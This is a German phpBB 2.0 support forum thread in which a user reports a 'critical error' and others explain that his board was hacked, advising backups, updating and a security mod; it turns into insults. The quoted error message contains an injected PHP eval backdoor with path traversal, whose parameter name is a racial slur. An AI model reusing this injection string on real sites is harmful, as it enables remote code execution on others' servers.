Hilfe: Kritischer Fehler!

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
honk_alert
Mitglied

Hilfe: Kritischer Fehler!

Beitrag von honk_alert »

Hallo,

ich bekomme immer diese Fehlermeldung, wenn ich auf mein Board gehe:

Code: Alles auswählen

phpBB : Kritischer Fehler

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 336
File : /home/vhosts/xxxx/xxxxx/htdocs/forum/includes/functions.php
:o
gloriosa
Mitglied

Hinweis

Beitrag von gloriosa »

Hallo,
auch wenn Du in Deinen bisherigen anderen Kommentaren nicht besonders höflich bist verweise ich hier trotzdem auf die Benutzung der boardeigenen Funktion [ externes Bild ] Suchen mit dem Suchbegriff nigga. In den Suchergebnissen wirst Du zahlreiche Suchergebnisse wie z.B. dieses finden ! :o
Viele Grüße - gloriosa :D
Die einen schützen sich vor frischem Wind, während die anderen ihn nutzen.
Kein kostenloser MOD-Einbau usw. bzw. Support via PN, Email oder IRC !
Coaster-Friend
Mitglied
Beitrag von Coaster-Friend »

Du wurdest immernoch gehackt ;).

Lies dir dazu einfach mal diese beiden Artikel in der Knowledge Base durch: Mein Forum wurde gecrackt - was nun? und So mache ich mein Board sicher ;).
Danach kannst du dir den CrackerTracker - Professional Edition installieren, welchen du hier in der MOD-Datenbank finden kannst ;).

Und jetzt komme nicht mit "das ist alles Müll, ich suche eine andere, einfachere Lösung", denn das, was da steht ist das A und O für ein sicheres Board ;).

Lösende Grüße,
Dominic Laumer

EDIT: Wohl zeitgleich mit Gloriosa gepostet ;).
Auf und nieder, immer wieder!

Meine Page :)
honk_alert
Mitglied

Beitrag von honk_alert »

Ihr seid mir beide echt zu dumm!
Valerie Raghnall
Mitglied

Beitrag von Valerie Raghnall »

Hast du ein Backup von deinen Dateien? Sollte man nämlich immer haben. Wenn du das hast, dann lad mal einfach die Dateien nochmal rauf... dann guck zu, dass du auf die neueste Version updatest (2.0.17) und dir den einen oder anderen SicherheitsMod (zB CrackerTracker) ins Board installierst.

An den Dateien selber kannst du am Server eigentlich nix mehr machen... die wurden gehackt und verändert, daher das Problem. In wie Weit das auch auf die Datenbank übergeht, kann ich dir jetzt nicht sagen, aber versuch's mal mit den Daten nochmal auf den Server... und wenn das nicht hilft, wirst du wohl das Forum neu installieren müssen...

Daher wäre auch ein laufende Datenbank Backup zu empfehlen... je nach Frequenz einmal die Woche oder öfter (oder weniger oft)...
A Bus Station is where buses stop. A Train Station is where trains stop. On my desk, there is a Work Station.
Horatio Caine
Mitglied

Was soll diese Beleidigung

Beitrag von Horatio Caine »

honk_alert hat geschrieben:Ihr seid mir beide echt zu dumm!
Hallo honk_alert,
was soll obige Beleidigung ?

Auch ich vermute, dass Du ein Mitglied bist welches bisher unter einem anderen Namen aktiv war ! :o

Da Du scheinbar zu bequem bist in den bereits erwähnten Suchergebnissen nachzulesen und keine bevorzugte Beachtung erfährst gehst Du auf die Mitglieder los die sich trotz einem immer schöner werdenden Sonntag Deiner angenommen haben ! :o

Du hast heute zahlreiche Minuspunkte gesammelt ! :D

Es ist abzuwarten ob denn die Admins oder Mods diesen und den zweiten Beitrag in dem Du Dich stark daneben benimmst nicht schließen ? :(
Have a nice day ! :grin:
honk_alert
Mitglied

Beitrag von honk_alert »

Ne, ich kann kein Update machen - wie auch? Ich komme nicht mehr in den Admin-Panel. ich sehe nur dauernd die Fehlermeldung!

Und ja, ich hab mir die Mühe gemacht, die Sachen zu lesen - blöd bin ich nicht. Nur ich mag keine Poster, die dauernd dieselben nichtssagenden Links posten und dann noch einen auf Klugscheißer machen... :roll:
Valerie Raghnall
Mitglied

Beitrag von Valerie Raghnall »

du sollst ja nicht über den adminpanel updaten sondern über die dateien...
A Bus Station is where buses stop. A Train Station is where trains stop. On my desk, there is a Work Station.
Markus67
Ehrenadmin
Beitrag von Markus67 »

Hi ....

und jetzt beruhigen wir uns alle wieder .....

@ honk_alert

Das hier ist Grundlektüre ... ohne das ist eine Lösung deines Problems nicht möglich ...
KB:gehackt
KB:sicher (und da vor allem der letzte Abschnitt)

Hier kann dir niemand eine Schritt für Schritt Anleitung geben wie du das Problem wieder lösen kannst. Es lässt sich zweifellos lösen .. aber dafür ist Mitarbeit von deiner Seite angesagt ... mit Forderungen stellen kommst du hier nicht weit.

Hier versucht dir jeder zu helfen... nimm die Hilfe an und lese. Solltest du irgedwas nicht verstehen kannst du gerne fragen - dafür sind wir hier da. Mit Beleidungen und ähnlichem wirst du aber kaum Hilfe finden.

Dazu kannst du dann auch mal hier ein bischen was nachlesen.
KB:knigge

Anschliessend benutzt du die Suche und gibst mal das Zauberwort nigga ein ... und dann bist du erstmal beschäftig mit lesen und Informationen sammeln. Und wenn es dann noch Probleme gibt, weil du an einer Stelle nicht sicher bist das richtige zu tun, dann kannst du schreiben (unter Berücksichtigung von diesem Artikel ... KB:frage_recht ) .... dann wird dir auch mit Sicherheit geholfen und dein Problem ist bald gelöst.

Ebenfalls werden Beleidigungen an andere User wie z.B. gloriosa nicht geduldet ... also ... besinne dich auf dein Problem und beginne es zu lösen.

Markus
honk_alert
Mitglied

Beitrag von honk_alert »

Markus, du peilst es nicht, oder? Ich hab den Knigge gelesen, den Artikel "Mein Board wurde gecrackt" und den ganzen anderen Shit. Zudem ein paar Beiträge, wo du genau das gepostet hast... Ist das hier ein Copy-And-Past-Forum mit lauter Leuten die keine Ahnung haben, wie man eine konkrete Frage beantwortet?

Wenn ich nach "nigga" suche, finde ich genau was? Ja, Beiträge von Markus und den ganzen anderen Leute, die darauf hinweisen, dass man den Knigge lesen soll und die oben genannten Artikel.

:roll:
Gesperrt

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“